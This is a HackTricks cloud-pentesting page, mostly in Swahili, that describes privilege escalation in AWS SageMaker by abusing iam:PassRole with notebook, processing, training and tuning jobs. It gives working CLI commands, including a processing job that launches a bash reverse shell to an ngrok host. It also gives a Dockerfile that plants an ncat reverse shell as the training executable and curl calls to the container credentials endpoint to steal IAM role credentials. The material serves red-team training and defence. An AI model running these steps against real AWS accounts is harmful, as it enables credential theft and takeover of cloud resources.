AWS - Sagemaker Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

`iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`

Anza kuunda notebook na IAM Role ili kupata iliyoambatanishwa nayo:

aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

Majibu yanapaswa kuwa na uwanja wa NotebookInstanceArn, ambao utakuwa na ARN ya mfano wa notebook mpya ulioanzishwa. Tunaweza kisha kutumia API ya create-presigned-notebook-instance-url kuunda URL ambayo tunaweza kutumia kufikia mfano wa notebook mara itakapokuwa tayari:

aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Navigate to the URL with the browser and click on `Open JupyterLab` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button.

Sasa inawezekana kufikia akreditivu za metadata za IAM Role.

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya sagemaker iliyotajwa.

`sagemaker:CreatePresignedNotebookInstanceUrl`

Ikiwa kuna Jupyter notebooks tayari zinaendesha kwenye hiyo na unaweza kuorodhesha hizo kwa sagemaker:ListNotebookInstances (au kuzipata kwa njia nyingine yoyote). Unaweza kuunda URL kwa ajili yao, kuzipata, na kuiba akreditivu kama ilivyoonyeshwa katika mbinu ya awali.

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililounganishwa.

`sagemaker:CreateProcessingJob,iam:PassRole`

Mshambuliaji mwenye ruhusa hizo anaweza kufanya sagemaker kutekeleza processingjob iliyo na jukumu la sagemaker lililounganishwa. Mshambuliaji anaweza kuashiria ufafanuzi wa kontena ambalo litakimbia katika AWS managed ECS account instance, na kuchukua hati za ruhusa za jukumu la IAM lililounganishwa.

# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya sagemaker iliyotajwa.

`sagemaker:CreateTrainingJob`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizo ataweza kuunda kazi ya mafunzo, ikiendesha kontena chochote juu yake na jukumu lililounganishwa nalo. Hivyo, mshambuliaji ataweza kuiba akidi za jukumu hilo.

Hali hii ni ngumu zaidi kutekeleza kuliko ile ya awali kwa sababu unahitaji kuunda picha ya Docker ambayo itatuma rev shell au creds moja kwa moja kwa mshambuliaji (huwezi kuashiria amri ya kuanzia katika usanidi wa kazi ya mafunzo).

# Create docker image
mkdir /tmp/rev
## Note that the trainning job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest

# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililotajwa.

`sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizo ataweza (kwa uwezekano) kuunda kazi ya mafunzo ya hyperparameter, akikimbia kontena chochote juu yake na jukumu lililounganishwa nalo. Sijafanikiwa kutumia kwa sababu ya ukosefu wa muda, lakini inaonekana kama mashambulizi ya awali, jisikie huru kutuma PR yenye maelezo ya matumizi.

Marejeleo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - S3 Privesc NextAWS - Secrets Manager Privesc

Last updated 3 days ago